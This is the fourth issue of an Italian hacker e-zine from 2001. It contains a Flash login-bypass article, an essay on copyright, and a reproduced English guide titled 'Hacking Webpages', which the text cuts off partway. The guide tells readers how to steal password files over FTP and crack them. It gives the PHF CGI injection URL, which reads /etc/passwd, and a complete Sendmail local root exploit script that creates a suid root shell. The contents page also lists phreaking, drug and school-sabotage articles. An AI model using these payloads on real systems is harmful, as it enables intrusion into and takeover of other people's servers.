/ D  .  i  .  r  .  t  .  y  .  N  .  e  .  t /
                               
                                       /n° 4 /

                       Rivista mensile/bimensile gratis sulla sicurezza 
                                numero "4" Aprile/Maggio 2001     
                   /Tutti i testi sono sottoposti ad adattamento - sYn /


                                  
                                  /Inizio Disclaimer /

Tutto il contenuto di questo file di testo è da ritenersi dannoso quindi non applicabile. 
L'utente è pregato di non mettere in atto quanto scritto .Esso è solo stato pubblicato 
per offrire una conoscenza maggiore in ambito ,NON per altri scopi.Il testo non si puo' 
modificare ne tanto meno vendere senza il consenso dell'autore.Se non si rispettano le 
norme l'utente avrà commesso azione illegale. In questo testo è solamente presente 
INFORMAZIONE, e l'informazione per legge è LEGALE. Leggendo queste righe tu ACCETTI I 
TERMINI descritti, se ci fosse qualcosa di contrario alla tua' mente, esci e cancella 
questo file.
    
                                    /Fine Disclaimer /

                                                      
                                      / website /       

                                http://www.hackersat.com 

                                        /email /

                               sYn          - syn@hackersat.com
                               A[v]a[t]A[r] - avatar@hackersat.com
                               Jrash        - jrash@hackersat.com
                               Ghent        - ghent@hackersat.com      
                               phaet        - vesa8_34@yahoo.it                         
                               Screenet_it  - screener_it@freemail.it
                               kEwL         - kewl@penguinpowered.com
                 
                                      /ascii /

                                       sYn

                                     /staff assemblo /
                                    
                                    sYn - A[v]a[t]A[r]                   
              
/===========================::=============================::=================/
/  /Indice /Allegati /                                                        /
/===========================::=============================::=================/

                                 
/800x600 standard full screen /



Indice    
     
           Titolo                                           Autore

/Intro /
                                                     
/Hacking (or coding) /                                   

           Flash hacking 1                                  -  Ghent
           Copyright Digitale                               -  Mr.A
           Hacking webpages                                 -  Virtual Circuit & Psychotic
           Semplice fake e-mail                             -  sYn
           Costruire un bunker linux: Firewalling di base   -  kEwL

/Hacking satellitare /

           Inserimento Zener                                -  sYn

/Mezzing /

           Modifica alla Scarabeo (Aprilia)                 -  Jrash
           L'inseguimento                                   -  Jrash

/Phreaking /

           Italian freching                                 -  A[v]a[t]A[r]

/Narcoting /

           Maria consigli e oltre                           -  phaet

/Illegality /

           Come impallare la scuola                         -  sYn

/Miscellanea /

           Shell for lamah                                  -  Jrash
           Test d'inteliggenza!                             -  sYn

/art1 /

           L'approccio in rete e more...                    -  sYn
           Carnivore Diagnostic Tool                        -  Screener_it
           Imapd exploit                                    -  SPYRO

/Outro /




 




Allegati  -  cartella "=attc="


gh.zip : file compresso contenete materiale prodotto da Ghent; hackerami.swf, pwdgate.fla. 
Vedi articolo.

reti.zip : file compresso contenente un file di testo inviato da Ulisses1 for Dn.

LINUS BIN.zip : mitico. Dopo averlo trovato è qui per voi il LINUS BIN MANAGER Ver 3.0.




.....finito il testo. Puoi pubblicare Dn4.             (ore 4:30, ultime parole di kEwL a sYn!) 


/===========================::=============================::=================/
/  /Intro /                                                  sYn              /
/===========================::=============================::=================/




Salve ragazzi, finalmente ce la ho fatta! Il mese di Aprile (dolce dormire) è 
stato abbastanza stressante da impedirmi di assemblare al meglio il quarto 
numero della rivista. Di impegni sono stato colmo e stracolmo. 
La mia schifosissima scuola mi ha tenuto impegnato per la costruzione di un sito 
personale e fetente! Per la rete ho vagato e vagato senza concludere quasi niente, 
ma in conpenso mi sono tolto il lusso di fare delle belle chattate interessanti! 
Ogni cosa che facevo, portavo a termine sembrava non conclusa; nella testa mi 
girava di tutto; colpa dei miei pensieri che tenevano impegnata perfino la mia 
mente! Alcune persone in rete che cercavo non sono riuscite a trovarle...ma adesso 
voi penserete su cosa ve ne possa fregare delle mie faccende. Io ve le sto solo 
citanto dimostrandovi in che stato ho collaborato. Aspettando le feste di Pasqua , 
che di sicuro non mi procureranno molto tempo libero, sto mettendo a posto 
un po' di documenti. Ne approfitto per dirvi che tutti voi potete apportare una 
piccola collaborazione scrivendomi e dicendo tutti i lati negativi che hanno riscontrato. 
Approposito di email, volevo dirvi una cosa importante: mi SCUSO con tutte le 
persone che mi hanno scritto a cui non ho potuto rispondere, data la notevole 
quantita' di email che mi stanno arrivando probabilmente nel prossimo numero 
della rivista sara' inserita una box mail con le vostre domande postemi..! 
Per ora pero' è solo un'idea. Mentre vi sto scrivendo sono appena le 10 pm.
Improvvisamente mi è venuta una voglia pazzesca di suonare un po' con 
una piccola tab appena scaricata da Olga (www.olga.net). Raga dato che non so 
proprio cosa cavolo dirvi vi faccio ridere un po' (o almeno spero:). 
Vi riporto un po' di cazzate che facevamo io e i miei amici in classe vi va? 
Ho sentito un Si. Xchè? 
Mi sono trovato il diario a 20 centimetri di distanza così ho detto di leggere 
cosa scrivevo nelle ore "morte". 
Bene iniziamo:

I libri che DOVEVO leggere
Verga - I Malavoglia  (infatti la voglia non mio venne proprio!)
Verga - MatroDongesulado (un nome + piccolo?)
Fogazzaro - Piccolo mondo antico (li sa' solo la prof. questi...)
D'Annunzio - Il piacere (ua lo ricordo...sembra strano ma mi sembra che mia 
mumy lo aveva letto...)
Pirandello - Il fu Mattia Pascal (un mito..Mattia ???)
Pirandello - Sei personaggi in cerca di autore (Lo faccio io, li pubblico anche!!)

All'1 settembre mi trovo uno skizzo di una sottospecie di cono, con sotto 
scritto "Sconto del 75% alla cassa!"....cosa ma ha pensato la mia mente?
...Tutti cercano amici ma nessuno si preoccupa di esserlo!...Bella questa chissa' 
che me la  ha scritta.
...skizzi a non finire...(quando non portavo i fogli bianchi, praticamente sempre...
...20:30 Matrix su tele+ ( mi so' segnato anche quando lo facevano...ma Matrix? Chi me 
lo ha scritto? )
...Comleanno di Nadia...chi se ne frega!...
...portare Dante...
...portare 10.000 £ ...alla faccio che li vado' a scava' i soldi ?
...tag a non finire...
...assemblea... (ma è il mio diario? a sisi è mio...)
...Anche se so che non te ne frega niente, io te lo dico lo stesso: oggi è il mio 
compleanno e compio ben 19 anni...questa ragazza mi conosceva bene bene!!!
...Pluto: strudiare l'aulularia (ero fatto mentre scrivevo...)
...(Qui c'è una pagina piena di firme uguali a quelle di mia madre...erano i miei provini!!!)
...Verso la fine sta scritto "E' finita" . MAGARI dicevo ogni volta che la scrutavo.


Prima di lasciarvi volevo ringraziare in particolare phaet e Ghent 
che hanno fornito davvero dei bei art.
Mi raccomando...non provate a votare BERLUSCONI !!!!! (lo so non c'entra niente..)

Basta ragazzi.
Mi è venuta una fitta allo stomaco.
Forse è meglio che la finisco....a prop...

Buona lettura!




/===========================::=============================::=================/
/  /Flash hacking 1 /                                        Ghent            /
/===========================::=============================::=================/

                                      

<hacking/webmastering>
___________________________________
##°°°°°°° FLASH HACKING 1°°°°°°° ##
## Banale Hack di Login in Flash ##
##~~~~~~~~~~ allegati: ~~~~~~~~~~##
## pwdgate.fla -  hackerami.swf  ##
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Allora, saluti a tutti: si parte con il primo di una (spero) serie di articoli 
aventi come tema usi un po' "particolari" di Flash e del suo ActionScript. 
Alcune cose potrebbero risultare incomprensibili a chi non usa Flash con un 
minimo di dimestichezza, ma d'altro canto sarerebbe assurdo se io mi mettessi 
a scrivere un corso di Flash: ce ne sono gia' tantissimi, e sicuramente 
scritti da gente piu' esperta di me. Un paio di link? www.html.it, ed il supremo, 
incommensurabile (ma in inglese) www.flashkit.com.

Ci tengo a dire che è il primo articolo per questa e-zine del tutto "mio", 
niente traduzioni o "cose del genere"... ;)

Allora... partiamo. Un trucchetto veloce veloce.
Se vi trovate davanti ad un login di un sito in Flash, ed il webmaster è un 
niubbo fetente :), potrebbe aver protetto una sezione o cos'altro semplicemente 
con un banale actionscript del genere

(metto i commenti per chi non conosce il mio amato actionscript di Flash)

***

//(Azioni associate ad un ipotetico bottone "Ok" di login)

on (release) { 			  //all'evento release (il rilascio del clic)
if (password=="pippo") {	  //se la variabile password (che sara' un textfield)
				  //è uguale alla stringa "pippo"
		gotoAndStop (10); //vai al fotogramma 10 (dove ci sara' la parte protetta)
	} else {		  //altrimenti
		nextFrame ();	  //vai al fotogramma successivo 
				  //(dove ci sara' un messaggio di errore)
	}
}


***


Bene, direte voi... ma io come faccio a sapere qual è lo script associato al bottone?
Dovrei avere il sorgente, il .fla... non l'swf "compilato" che vedo nel browser...

...ed invece no, nessun problema.
Esistono dei programmi per estrarre il codice anche dagli swf o che li sproteggono 
dalla modifica (un settaggio del publish di Flash consente di proteggere gli swf 
dall'importazione), ma noi non avremo bisogno neanche di questo... (e poi io non 
ne ho nessuno! Mica scopiazzo, io... sono un designer serio! :P)
Infatti, ed ho provato hackerando un mio stesso filmato, basta aprire gli swf con 
un hex editor per vedere una buona parte degli script contenuti, se non tutti (non 
mi sono mica messo a confrontare!) 
ehehe, avrete ben capito che non ci vuole molto a trovare l'action che ci interessa, 
probabilmente bastera' cercare "pwd", "pass" "login" e cose del genere con l'hex editor...

Altro trucco molto semplice: molti niubbi si dimenticando del "play" che compare 
cliccando col tasto destro quando si sta visualizzando un .swf : questo comando 
manda avanti il movie con una action "play()", e questo puo' essere determinante 
in caso di accesso ad una zona protetta: mi spiego meglio.
Ipotizziamo che ci sia il primo fotogramma del movie con il login, il secondo 
fotogramma con un messaggio di errore per avvertire che il login non è valido, 
ed il terzo fotogramma con la parte "accesso ristretto". Bene, su ogni 
fotogramma c'è una action "stop()", che praticamente ferma il movie fotogramma 
per fotogramma. Ipotizziamo che all'"Ok" del login ci siano queste azioni:

***

on (release) { 			  //all'evento release (il rilascio del clic)
if (password=="vivaledonne") {    //se la variabile password (che sara' un textfield)
				  //è uguale alla stringa "vivaledonne"
		gotoAndStop (2);  //vai al fotogramma 3 (la parte protetta)
	} else {		  //altrimenti
		nextFrame ();	  //vai al fotogramma successivo 
				  //(dove ci sara' un messaggio di errore)
	}
}

***

Ora, c'è una grossa falla in questo login:
Nel nel frame del messaggio di errore, c'è solo uno Stop che impedisce di andare 
avanti ed accedere alla parte protetta... in pratica sbagliando la pwd si ariva al 
fotogramma 2, ed il movie si ferma. Ma basta un right-click, e la scelta 
di "play" (o "riproduci" nella versione italiana del plugin) per avviare nuovamente 
il movie, che andra al fotogramma 3! :)
Banale, eh?

Per evitare questo giochetto, basta spostare il fotogramma "protetto" dalla 
posizione 3 alla 4 o magari alla 5, proprio per stare sicuri, ed assegnare ai 
fotogrammi vuoti tra quello del messaggio d'errore e quello della parte 
protetta (il 3, o il 3 ed il 4 se si è spostato il frame da proteggere nella 
posizione 5) l'azione

gotoAndPlay (1);

in modo tale che si venga portati al primo fotogramma del movie se si prova a 
mandare in play oltre il secondo fotogramma.

In pratica, si otterra':

Fotogramma 1 - login
	frame actions: stop();
	- textfield di input con assegnata variabile "password"
	- bottone di ok
		azioni bottone: 
		on (release) { 		
		if (password=="vivaledonne") {   
		 	gotoAndStop (5); 
		  } else {		  
			nextFrame ();	  
		  }
		}

Fotogramma 2 - messaggio di errore
	frame actions: stop();
	- textfield statico contenente messaggio di errore
	- bottone per tornare al primo fotogramma, che azzera anche la var "password"
		azioni bottone:
		on (release) {
		    password = "";
		    gotoAndPlay (1);
		}

Fotogramma 3 - anti/bypass del login
	frame actions: gotoAndPlay (1);

Fotogramma 4 - anti/bypass scaramantico del login
	frame actions: gotoAndPlay (1);

Fotogramma 5 - Area protetta


Spero di essere stato chiaro, ma sono sicuro che tutto cio' e' apparso banalissimo a 
chi usa Flash.

In allegato il file hackerami.swf, come compito a casa :)
Ho cercato di rendere difficilmente individuabile la pwd, per quanto possibile senza 
criptarla con le funzioni che sto facendo (prossimo numero della ezine ;)? ), ma sono 
sicuro che la troverete facilmente, riuscendo cosi' a leggere il messaggio protetto da 
pwd...ehehe, curiosi?

In caso non ci riusciste, o se vi servono chiarimenti/consigli, vi ricordo la mia email: 
ghent@hackersat.com

(naturalmente sapete che dovete aprire l'swf col browser, no? E che ovviamente dovete 
avere il plugin di Flash installato? :))

Ok, ora che abbiamo visto come sfruttare questo paio di trucchetti  per eventuali 
nostre necessita', vediamo invece come preparare un login *sicuro* in Flash.

Il punto debole è che le stringhe delle pwd vengono riportate in chiaro nell'swf, 
quindi noi faremo in modo che queste NON ci siano.... 

Come?
Semplice, usando uno script server side, il quale non viene eseguito in locale come 
accade invece coll'swf di Flash. 
Direte voi, grazie al kaiser... ma chi li conosce ASP, PHP o C... chi è capace di 
preparare un CGI che possa comunicare con Flash? O ancora, anche volendo imparare 
a fare qualcosa del genere, chi è che mi compra uno spazio FTP che mi consenta di 
usare script server side? E' difficile trovare uno spazio free che lo permetta (se 
ne conoscete di affidabili, di corsa a comunicarmeli a ghent@hackersat.com :)).

Beh, io non sono capace di fare un CGI in Perl ne' ho comprato spazio, ma alla 
fine 'sto login l'ho fatto decentemente.

Mi sono appoggiato alla "password gate" di BraveNet, (www.bravenet.com), ottimo 
sito che offre numerosi servizi free per webmaster. In pratica, dopo aver 
sottoscritto a Bravenet, attivato e configurato la password gate (operazioni 
banalissime sulle quali non mi vado a dilungare), viene dato un frammento di 
codice da inserire nella propria pagina web per far apparire la form di login.

Dico, ma noi siamo gente che incolla frammenti di codice senza capire cosa fanno, 
lasciando l'orrendo design standard del login di BraveNet a rovinarci lo stile del sito?
CERTO che no! :)

Login in Flash si è detto, login in Flash sara', Ghent ha parlato! (sono 
leciti i "chissenefrega" :))

Andiamo a vedere un esempio di codice fornito da Bravenet per la password gate...


***

<div align="center">
<form action="http://pub41.bravenet.com/passwd/show.php" method="post">
<input type="hidden" name="usernum" value="0123456789" />
<input type="hidden" name="cpv" value="1" />
<table border="0" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><tr>
<table border="0" width="220" bgcolor="#999999" cellpadding="3" cellspacing="1">
<tr bgcolor="#eeeeee"><td align="center" nowrap><FONT face="Arial,Helvetica" size="2">
<b>Enter Password Protected Area</b></font></td></tr>
<tr bgcolor="cornsilk"><td><table border="0" cellpadding="0"><tr>
<td><FONT face="Arial,Helvetica" size="2">User&nbsp;Name:</font></td>
<td width="10">&nbsp;</td>
<td><input type="text" name="uname" size="15" maxlength="254" /></tr></tr>
<tr bgcolor="cornsilk"><td><FONT face="Arial,Helvetica" size="2">Password:</font></td>
<td width="10">&nbsp;</td>
<td><input type="password" name="passwd" size="15" maxlength="254" /></td></tr>
<tr bgcolor="cornsilk"><td colspan="3" align="center"><a href="http://www.bravenet.com/"><img src="http://images.bravenet.com/brpics/passwd.gif" border="0" align="center" width="100" height="35" /></a>
&nbsp;&nbsp;&nbsp;&nbsp;<input type="submit" name="submit" value="Login" /></td></tr></table></td></tr>
</table></td></tr></table></form>
</div>

***

bene, in pratica, sintetizzando un po' e sperando che capiate almeno un poko poko di 
HTML, si tratta di un form con due campi testo visibili, user e password, e altri 
campi nascosti (quelli settati con HIDDEN). Come form action c'è il sending in POST 
di queste variabili dei campi testo, nascosti o meno che siano, alla 
pagina "http://pub41.bravenet.com/passwd/show.php" che è in pratica l'indirizzo della 
pagina PHP che si occupa di verificare se il login mandato (i valori user/pwd immessi 
nei campi testo visibili) sono validi per l'accesso ad una determinata pagina che noi 
avremo settato nella members area di Bravenet.
Inoltre, c'è un po' di monnezza che non ci interessa: il logo di BraveNet, la centratura, 
i colori ed i font.

In pratica le righe chiave sono queste:

***

<form action="http://pub41.bravenet.com/passwd/show.php" method="post">
<input type="hidden" name="usernum" value="0123456789" />
<input type="hidden" name="cpv" value="1" />
<td><input type="text" name="uname" size="15" maxlength="254" /></tr></tr>
<td><input type="password" name="passwd" size="15" maxlength="254" /></td></tr>

***

In teoria, ho pensato io, se faccio mandare queste variabili da Flash e non da HTML, 
che se ne frega BraveNet? Ed infatti, per fortuna, è andata cosi' :)

E' bastato preparare un clip di login coi campi testo user/password, per poi settare 
delle variabili interne destinate a essere mandate alla pagina PHP di bravenet alla 
pressione di un bottone...

Funziona perfettamente... :))

Ecco il codice associato al bottone "OK" contenuto nel movieclip "login", che contiene 
a sua volta i campi di input text login/password e le variabili di cui sopra.

//inizio codice
on (release) {
	uname = _root.loginclip:userid;
	passwd = _root.loginclip:password;
    	usernum ="1234567890"          //vostro identificativo Bravenet
    	cpv = "1"		       //ehm, non lo so :)))
	getURL ("http://pub41.bravenet.com/passwd/show.php", "_top", "POST");
}
//fine codice

E ora mi direte... "ebbravo, funziona... ma che schifo! La barra di pubblicita' che mi 
piazza BraveNet in un frame inferiore è enorme!"

Tsk tsk, nessun problema: basta impostare come pagina di destinazione della gate, 
dall'area di manutenzione di BraveNet, non la pagina che volete proteggere ma un 
banalissimo documento html di redirect, cosi' preparato:

<!--inizio codice - hackers@ redirect -->
<HTML>
<HEAD>    
    <TITLE>REDIRECT</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <SCRIPT LANGUAGE="JavaScript">
      function Redirect() {
      window.open('QUI_LINK_ALLA_PAGINA_CHE_VUOI_PROTEGGERE','_top');
     }
</script>
<BODY onload="Redirect()">
</HEAD>
</HTML>
<!--fine codice - hackers@ redirect -->

Semplice, no? Appena caricata la pagina (Body Onload) la funzione Redirect porta alla 
pagina che noi si voleva proteggere... importante è il target "_top", che mostra la 
pagina a tutto schermo, elimando eventuali frames (e quindi anche la barra di BraveNet).

Vi assicuro che non fa neanche in tempo ad apparire... cmq vi invito, come faccio sempre io, 
a "rendere omaggio" a BraveNet per i suoi servizi applicando il bannerino "Proud Member 
of BraveNet" sulla homepage... il loro codice standard rovina il design e quindi si 
manipola a proprio piacimento, ma un po' di pubblicita' in segno di graditudine è il 
caso di fargliela.

Ho preferito lavorare in un moviclip a se' stante e non sulla root del movie per fare 
in modo che il clip possa essere facilmente inserito ovunque da chiunque, una volta 
modificato...

Potete vedere un esempio di realizzazione pratica nel pwdgate.fla allegato alla ezine, 
scopiazzatelo liberamente ma soprattutto cercate di capire come funziona... questa 
cosa del mandare variabili da Flash ha numerosissime applicazioni, fidatevi.

Alla prossima, appena ho tempo... speriamo presto... :)

          
      []_H@_Team_[]       Nothing you can contemplate will ever be the same
      []#_Ghent_#[] 	Every second is a new spark, sets the universe aflame
      [][]=====[][]		  = Iron Maiden- "The WickerMan" =
	






/===========================::=============================::=================/
/  /Copyright Digitale /                                     Mr.A             /
/===========================::=============================::=================/




PS 
Norm, sei condannato ad essere messo in CC e a dover leggere l'articolo in anteprima : P

--------------------------------------------------------------------------------

Copyright Digitale

Una domanda da parecchi mesi rotola in giro per la mia testa senza 
trovare una risposta soddifacente per quanto butti via una discreta fetta 
del mio tempo libero nel cercare una soluzione a questo inghippo. La 
domanda in questione riguarda il significato del copyright in un epoca in 
cui la copia o la moltiplicazione in serie di ogni tipo di informazione 
e di ogni genere di documento, quale che sia il suo formato di 
supporto, è di una semplicità imbarazzante oltre che di una economicità 
scandalosa. La domanda per la precisione è più di una ed è riassumibile in 
poche semplici affermazioni. Ha ancora senso al giorno d'oggi la tutela 
del diritto d'autore? è ancora possibile tutelare in maniera 
soddisfacente il copyright? Non è forse opportuno rivedere il concetto stesso di 
diritto d'autore per adattarlo alla mutata situazione del mercato? Alcune 
considerazioni iniziali possono essere utili per capire quanto la 
situazione attuale ponga seri proglemi al tentativo di tutelta del diritto 
d'autore. 
Il costo attuale di un CD ROM vergine si aggira attorno alle 900 L, 
quello di un masterizzatore di velocità accettabile attorno alle 300.000 
L, giusto per restare nel campo dell'informatica, la loro reperibilità è 
estremamente alta visto che un masterizzatore è reperibile in qualunque 
negozio di Hardware ed i CD ROM sono acquistabili addirittura al 
supermercato. Quindi per chiunque è assolutamente semplice procurarsi i 
mezzi attraverso i quali la violazione del copyright per il software è 
possibile.Il costo del software più economico, identificabile con i 
videogames è ci circa 100.000 L, questo implica che la masterizzazione di 4 
videogiochi consente all'utente l'ammortamento della spesa iniziale ed
 appunto dalla quarta copia inizia per l'appassionato videogiocatore il 
guadagno.Consideriamo ora invece un altro genere di violazione del 
copyright che non ha base informatica. E' pratica assai comune tra gli 
studenti universitari ed anche tra i giocatori di ruolo la 
fotocopiatura dei testi. in questo caso non si è ancora arrivati ad una semplicità 
pari a quella delle copie di CD rom, visto che i costi per l'acquisto 
delle fotocopiatrici è elevato, ed il costo di una singola fotocopia si 
aggira attorno alle 50-60 lire, e questo implica un costo epr ciascun testo 
attorno alle 30-40.000 L. Ciononostante questa pratica è ampiamente diffusa 
visto i costi spropositati di questi testi. In questo campo inoltre si va
 diffondendo la digitalizzaione dei testi tramite scanner e OCR per 
rendere piu economica e più facilmente trasmissibile l'informazione. 
Ultimo e lampante esmpio è quello della diffusione del formato .mp3 per 
l'audio ed ultimamente del formato divX:-) per il video. Questi due generi di
 formati consentono una facile trasmissibilità via rete dell'audio e 
del video e permettono altresì di immagazzinare una quantità immensa di 
dati in uno "spazio" molto piccolo. Visti quindi tutti questi scenari 
presenti è abbastanza facile capire che al giorno d'oggi la protezione 
del diritto d'autore così come è stata finora intesa non solo non è più 
attuabile ma risulta essere spesso priva di senso. Un'obiezione semplice 
a questo ragionamente può essere il fatto che comunque per poter avere 
copie di un informazione è necessario avere almeno un originale, 
ma spesso questo problema è bypassabile con l'osservazione che molte 
persone sono disposte a comprare un originale per poi vendere a 
prezzi modici grandi quantità di copie per mezzo delle quali ottenere 
sostanziosi guadagni. E' altresì comprensibile l'impossibilità di 
abolire il diritto d'autore in quanto è necessario per chi dedica tempo alla 
produzione di un'informazione o comunque di un'opera d'ingegno venga 
ripagato del suo lavoro; è quindi evidente che deve essere modificata 
la struttura attuale non solo di leggi e regolamenti ma anche di cultura 
che vige attorno al concetto di copyright. E' fondamentale poter 
trovare il giusto punto di equilibrio tra la necessità di gudagano del 
produttore e la necessità morale della maggior diffusione possibile del prodotto. 
Sembra essere questa la questione che dovrebbe interessare chi si 
occupa di copyright, invece le leggi ultimamente licenziate in tutto il 
mondo vanno verso la repressione della diffuzione dell'informazione nel
 tentativo di tutelare una serie di privilegi che la tanto nominata 
globalizzazione e la società dell'informazione hanno già abbattuto alle 
fondamenta  appunto per la stessa loro definizione. E' quindi evidente 
come l'esistenza in italia ancora di un organismo quale la SIAE che ha 
il monopolio assoluto sulla gestione del diritto d'autore va contro 
ogni logica di mercato oltre che di buonsenso. Questa organizzazione si 
pone lo scopo di tutelare l'autore di un'opera di ingegno e di tutelare 
l'opera stessa da quella che loro definiscono "pirateria" che altro non 
è in realtà se non il tentativo di rottura di questo monopolio. La SIAE 
obbliga chi vuole tutelare i propri diritti a versare una quota di 
iscrizione, oltre che versare una parte dei guadagni alla SIAE stessa; in cambio di 
questo l'ente di occupa di andare a cercare le violazioni e di 
perseguirle, oltre che di riscuotere per conto dell'autore i diritti. In pratica 
l'ente chiede soldi SIA a chi produce SIA a chi consuma, e obbliga 
chiunque produce a pubblicare la produzione SOLO se iscritto, infatti in italia 
è illegale commercializzare libri, CD, cassette, e qualunque altro 
supporto per informazioni senza il mitico bollino SIAE. Questa forma di 
protezione poteva avere un senso quando il contatto tra l'autore e
 il fruitore dell'opera era impossibile o difficoltoso percui l'autore 
non era in grado materialmente di far valere i suoi diritti 
direttamente nei confronti dell'utente; allo stato attuale invece avviene esattamente 
l'opposto, infatti il contatto tra chi produce e chi consuma è altamente 
facilitato dalla rapidità di trasmissione delle informazioni oltre che 
dalla rapidità di trasmissione dei mezzi stessi che convogliano le 
informazioni; non sarebbe quindi affatto difficile acquistare un libro 
direttamente dall'autore e vederselo spedito a casa entro pochi giorni; 
questo diminuirebbe i costi, oltre che permettere un maggiore margine 
di guadagno all'autore e quindi una dimiuizione sostanziosa dei
 prezzi. Questo non servirebbe sicuramente a "blindare" il diritto 
d'autore ma aiuterebbe ad una maggiore diffusione di copie "legali". Il 
modo migliore per eliminare le violazioni del copyright consiste 
sicuramente nell'autenticazione diretta della copia dopo l'acquisto. Ovvero la 
copia viene abilitata all'utilizzo mediante un codice unico criptato che 
viene fornito su richiesta a seguito dell'acquisto, indi per cui se 
l'abilitazione per la medesima copia viene richiesta più di una volta è possibile 
anche risalire a colui il quale ha perpetrato la truffa. Questo però va
 accompagnato sicuramente da una maggiore accessibilità 
all'informazione che allo stato attuale è considerato bene d'elite e quindi
 distribuito con parisimonia solo a chi ha i mezzi economici e 
culturali per procurarselo. In sintesi ritengo che l'abbattimento delle attuali
 barriere formali e burocratiche, unito ad una facilitazione 
dell'accesso ai beni sia la strada da perseguire per garantire le necessità di 
tutti.
 Mi piacrebbe che da questo articolo scaturisse una seria e meditata 
discussione sull'argomento in quanto ritengo di non essere riuscito
 ad andare sufficentemente a fondo nella questione (principalmente in 
quanto non sono un esperto in materia) e che l'ipotesi da me formulata
 non sia altro che una delle innumerevoli soluzioni che possono essere 
poste al problema, e sicuramente non la migliore.


Mr.A







/===========================::=============================::=================/
/  /Hacking webpages /                                       Virtual Circuit and Psychotic
/===========================::=============================::=================/


     
Hacking Webpages
The Ultimate Guide
By Virtual Circuit and Psychotic


Well Psychotic wrote one of the most helpful unix text files in cyberspace but 
with the mail that we recieved after the release of our famous 36 page Unix 
Bible we realised that unix isn't for everybody so we decided that we should 
write on another aspect of hacking..... Virtual Circuit and Psychotic is proud 
to release, "Hacking Webpages With a few Other Techniques."  We will discuss a 
few various ways of hacking webpages and getting root.  We are also going to 
interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous 
ftp access into a webpage. First you need learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the 
part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little 
difference, it's shadowed. Shadowed password files don't let you view or 
copy the actual encrypted password.  This causes problems for the password 
cracker and dictionary maker(both explained later in the text). Below is 
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or 
sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file 
looks like you should be able to identify a normal encrypted pw from 
a shadowed pw file. We can now go on to talk about how to crack it. 

Cracking a password file isn't as complicated as it would seem, although the 
files vary from system to system. 1.The first step that you would take is to 
download or copy the file. 2. The second step is to find a password cracker 
and a dictionary maker. Although it's nearly impossible to find a good cracker 
there are a few ok ones out there. I recomend that you look for Cracker Jack, 
John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary 
maker or a dictionary file...  When you start a cracking prog you will be asked 
to find the the password file. That's where a dictionary maker comes in. You can 
download one from nearly every hacker page on the net.  A dictionary maker finds 
all the possible letter combinations with the alphabet that you choose(ASCII, caps, 
lowercase, and numeric letters may also be added) .  We will be releasing our pasword 
file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As 
far as we know it will be one of the largest in circulation. 3. You then start up the 
cracker and follow the directions that it gives you.


The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody 
already knows it and most servers have already found out about the bug and fixed it. 
But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password 
file(although it doesn't work 95% of the time). But to do the phf all you do is 
open a browser and type in the following link: 

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 

You replace the webpage_goes_here with the domain. So if you were trying to get 
the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).


Telnet and Exploits 

Well exploits are the best way of hacking webpages but they are also more complicated 
then hacking through ftp or using the phf. Before you can setup an exploit you must 
first have a telnet proggie, there are many different clients you can just do a netsearch 
and find everything you need.
It's best to get an account with your target(if possible) and view the glitches from the 
inside out. Exploits expose errors or bugs in systems and usually allow you to gain root 
access. There are many different exploits around and you can view each seperately. 
I'm going to list a few below but the list of exploits is endless. 

This exploit is known as Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);      
 }                                             
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0); 
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi 


and now on to another exploit. I'm going to display the pine exploit through linux. 
